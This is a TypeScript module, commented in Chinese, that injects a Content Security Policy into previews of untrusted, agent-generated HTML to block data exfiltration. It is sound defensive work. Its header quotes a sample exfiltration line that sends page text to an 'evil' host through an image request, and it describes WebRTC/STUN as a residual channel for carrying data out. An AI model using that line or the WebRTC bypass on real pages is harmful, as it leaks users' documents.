/**
 * 给 HTML 预览文档注入内容安全策略(CSP)。
 *
 * 为什么需要:预览的是 agent 产出、可能受提示注入影响的**不可信**文档,而渲染态要保留
 * JavaScript(设计稿的标签切换等交互依赖它)。而 `onShouldStartLoadWithRequest` **只管
 * 导航**,完全不经过子资源请求 —— 一段
 * `new Image().src = 'https://evil/?d=' + encodeURIComponent(document.body.innerText)`
 * 会在用户打开预览的那一刻静默把文档正文发出去,导航回调一无所知(review P1 实捉)。
 *
 * 所以出网必须由**渲染引擎强制**关闭,而不是靠我们在导航回调里约定。这里用 meta CSP
 * 关掉 CSP 管得到的全部出口:子资源、`fetch` / `XHR`、表单、iframe、插件。配套的另一半在
 * HtmlFileReader:顶层导航只放行 `about:`,连用户点击的外链也不外送。
 *
 * 代价(刻意接受,PR 已写明):公网 https 图片 / 字体 / 脚本在预览里**不再加载**。
 * 允许它们就等于留一条 `img-src https:` 的外传通道(`new Image().src='…?d=…'` 正是最经典的
 * 姿势),那会让上面整段封锁形同虚设。
 *
 * ── ⚠️ 残留信道:WebRTC(**不要把本模块说成「零出网」**) ────────────────────
 * `RTCPeerConnection` 的 ICE / STUN / DTLS 流量**不受 CSP 各 `*-src` 指令管辖** —— 恶意脚本
 * 可以把文档内容编码进 STUN 服务器域名,或直接与固定 peer 建数据通道外传,全程不经过导航
 * 回调、也不产生任何 CSP 管辖的 URL 请求(review P1 实捉)。本文件与 HtmlFileReader 早先的
 * 注释把这套封锁描述成绝对的,**那是错的**,已改;守卫用例禁止那类措辞回归。
 *
 * 已做的收窄:
 *  - `webrtc 'block'`(CSP3):Chromium 111+ 实现,Android System WebView 走 Chromium 内核、
 *    随 Play 商店更新,实机上基本都覆盖 → 那一侧是真封住的。**iOS 的 WKWebView 是 WebKit,
 *    尚未实现该指令,这条在 iOS 上无效**。未知指令被引擎忽略、不影响策略其余部分,所以加
 *    它没有副作用。
 *  - `mediaCapturePermissionGrantType="deny"`(见 HtmlFileReader):挡掉摄像头 / 麦克风取用。
 *    它**不能**关闭 WebRTC 外传 —— 纯数据通道与 STUN 候选收集都不需要媒体权限;这条是
 *    「不可信页面不该弹权限框」本身的正确做法,不要当成 WebRTC 的解。
 *
 * iOS 上要真正封死只有一条路:`javaScriptEnabled={false}`。那会让带交互的产物(标签切换、
 * 折叠、图表)退化成静态页 —— 属产品取舍,已在 PR 描述里显式提给放行人裁决,本层不擅自决定。
 *
 * 与「同目录资源透传」的关系(见 htmlLocalResources,栈上一层):资源一律以 `data:` URI
 * 内联、页面里不出现任何 bearer 凭证。那条路把被控端的文件内容带进页面,更需要这里的
 * 封锁 —— 但封锁本身属于「在 WebView 里渲染不可信 HTML」这件事,所以留在这一层。
 */

/** 预览文档的策略:默认全拒,只放行内联与 data: 资源,CSP 管得到的出口一律关闭。 */
export const HTML_PREVIEW_CSP = [
  "default-src 'none'",
  "img-src data:",
  "media-src data:",
  "font-src data:",
  "style-src 'unsafe-inline' data:",
  "script-src 'unsafe-inline' data:",
  "connect-src 'none'",
  "form-action 'none'",
  "base-uri 'none'",
  "frame-src 'none'",
  "object-src 'none'",
  // Chromium 111+ 才实现(Android System WebView 覆盖,iOS WKWebView 无效);
  // 未知指令被忽略、不影响其余策略。残留面见头注的「WebRTC」一节。
  "webrtc 'block'",
].join('; ');

const CSP_META = `<meta http-equiv="Content-Security-Policy" content="${HTML_PREVIEW_CSP}">`;

/**
 * 文档开头的 doctype:只认**紧贴开头**(允许 BOM / 空白)的那一个。
 * 出现在别处的 doctype 是无效标记,浏览器忽略,我们也不据它定位。
 */
const LEADING_DOCTYPE_RE = /^<!doctype[^<>]*>/i;

/**
 * 文档前导段的结束下标(BOM + 空白 + **完整注释序列** + doctype),没有可用 doctype 时 -1。
 *
 * 为什么要跨过前导注释(review P2 实捉):生成物常以许可证 / 生成器注释开头
 * (`<!-- generated by … --><!doctype html>`)。只认「紧贴开头的 doctype」时这类文档匹配
 * 不上,CSP meta 会被插到**整份文档最前面、doctype 之前** —— 解析器在 meta 之后再遇到
 * doctype 就忽略它、进入 quirks mode,依赖标准盒模型的排版整体变形。
 *
 * **写成过程扫描而不是一条正则**:`(?:\s|<!--[\s\S]*?-->)*<!doctype…>` 这类形态在
 * 「一堆空白与注释但最终没有 doctype」的输入上会大量回溯,而输入是不可信产物 ——
 * 那就是一条 ReDoS。这里线性前进,只跨过**已闭合**的注释,绝不进入注释内部。
 */
function leadingPrologEnd(html: string): number {
  let i = html.charCodeAt(0) === 0xfeff ? 1 : 0;
  for (;;) {
    while (i < html.length && /\s/.test(html[i])) i += 1;
    if (!html.startsWith('<!--', i)) break;
    const close = html.indexOf('-->', i + 4);
    // 未闭合注释:后面整份都是注释内容,没有"doctype 之后"这个位置可用。
    if (close < 0) return -1;
    i = close + 3;
  }
  const doctype = LEADING_DOCTYPE_RE.exec(html.slice(i));
  return doctype ? i + doctype[0].length : -1;
}

/**
 * 把 CSP meta 插到**任何作者内容之前**(doctype 之后)。
 *
 * ⚠️ 这里**刻意不去找 `<head>`**(review P1,Codex 与 Greptile 各报一次):
 *  - 找 `<head>` 的正则会命中注释里的假标签(`<!-- <head> -->`),CSP 被插进注释、
 *    策略被整份忽略;
 *  - 即使命中真的 `<head>`,真实 `<head>` **之前**的内容(浏览器会把前置 `<script>`
 *    照常执行)仍在策略生效前跑,足够在网络被封锁之前把刚内联的资源正文外传。
 * meta CSP 只对它之后的内容生效,所以唯一安全的位置就是最前面。
 *
 * doctype 必须保持在最前:把 meta 插到它前面会让文档掉进 quirks mode、排版变形 ——
 * 包括 doctype 前有许可证注释的情况(见 leadingPrologEnd)。
 * 插在 doctype 之后、`<html>` 之前是合法的 —— 解析器在 "before html" 模式遇到
 * 非 html 标签会隐式建出 html/head 并把 meta 放进 head,与显式写在 head 里等效。
 */
export function withHtmlPreviewCsp(html: string): string {
  const at = leadingPrologEnd(html);
  // 无 doctype(或整份是未闭合注释):直接前置 —— 那种文档本来就在 quirks mode,
  // 没有「保住标准模式」这个约束,策略越早生效越好。
  if (at < 0) return CSP_META + html;
  return html.slice(0, at) + CSP_META + html.slice(at);
}
